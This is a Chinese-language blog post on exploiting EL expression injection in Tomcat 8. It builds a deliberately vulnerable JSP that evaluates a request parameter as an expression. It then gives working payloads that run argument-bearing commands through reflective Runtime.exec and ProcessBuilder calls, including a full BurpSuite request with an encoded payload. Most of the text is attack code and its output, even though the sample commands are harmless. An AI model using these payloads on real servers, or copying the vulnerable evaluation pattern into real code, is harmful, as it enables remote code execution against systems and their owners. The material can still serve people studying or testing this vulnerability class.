tomcat,el表达式执行带参数命令,字符串数组,String[],el表达式注入

news/2024/9/20 5:56:18 标签: tomcat, java

准备环境:

docker pull tomcat:8;


docker run --name tomcat8 -p 808:8080 -v /tmp/CC:/usr/local/tomcat/webapps/  -d tomcat:8;

如下为 /tmp/CC/app/index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" isELIgnored="false" %>
<%@ page import="org.apache.jasper.runtime.PageContextImpl" %>

<%
    String codeParam = request.getParameter("code");
    String input = (codeParam != null && !codeParam.isEmpty()) ? codeParam : "";
    out.println("Input: " + input + "<br>");
    String res = (String) PageContextImpl.proprietaryEvaluate(input, String.class, pageContext, null);
    out.println(res);

Boolean re2 = (Boolean) PageContextImpl.proprietaryEvaluate("${(4*2) > 0 && 2 > 0}", Boolean.class, pageContext, null);
out.println(re2);

Long re4 = (Long) PageContextImpl.proprietaryEvaluate("${(4*2) > 0 && 2 > 0 ? 8 : 0}", Long.class, pageContext, null);
out.println(re4);
%>

那么code可以为:

code=${a123=["ping","-c","30","127.1"];a123.getClass()}

输出:class java.util.ArrayList

${a123=["ping","-c","21","127.1"];a123.toString()}
#输出:[ping, -c, 21, 127.1]

${a123="ping,-c,28,127.1";a123.toString().split(",").getClass()}
#输出:class [Ljava.lang.String;

${a123="touch,/tmp/Z";b1=a123.split(",");b123=b1.getClass();a12=''.getClass().forName("java.lang.Runtime");a12.getMethod("exec",b123).invoke(a12.getMethod("getRuntime").invoke(null),b1)}
#输出Process[pid=806, exitValue="not exited"]

是仿照这句话改造的:

${a123=javax.script.ScriptEngineManager.newInstance();a123.getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc.exe')")}

BurpSuite 的repeater :

POST /app/index.jsp HTTP/1.1
Host: 127.0.0.1:8088
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5CA5923F898DF72C4FC49863E68A9257
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 563

code=${a123%3d"touch,/tmp/Z"%3bb1%3da123.split(",")%3bb123%3db1.getClass()%3ba12%3d''.getClass().forName("java.lang.Runtime")%3ba12.getMethod("exec",b123).invoke(a12.getMethod("getRuntime").invoke(null),b1)}

如下可以用

code=${Runtime.getRuntime().exec("ping,-c,28,127.1".split(","))}
#这样也可以的,输出 Process[pid=825, exitValue="not exited"]

但是如下就不行了,原因不明:

code=${java.lang.Runtime.getRuntime().exec("ping,-c,28,127.1".split(","))}

仅仅加了开头的: java.lang

附赠java.lang.ProcessBuilder类执行带参数命令:

${a="".getClass().forName("java.lang.ProcessBuilder");b=a.getDeclaredConstructor("".split(",").getClass());c=b.newInstance("ping,-c,78,127.1".split(","));c.start()}

如下代码失败,原因不明:

${a=java.lang.ProcessBuilder.newInstance("ping,-c,178,127.1".split(","));a.start()} 
#失败
${a=ProcessBuilder.newInstance("ping,-c,178,127.1".split(","));a.start()} 
#失败

参考: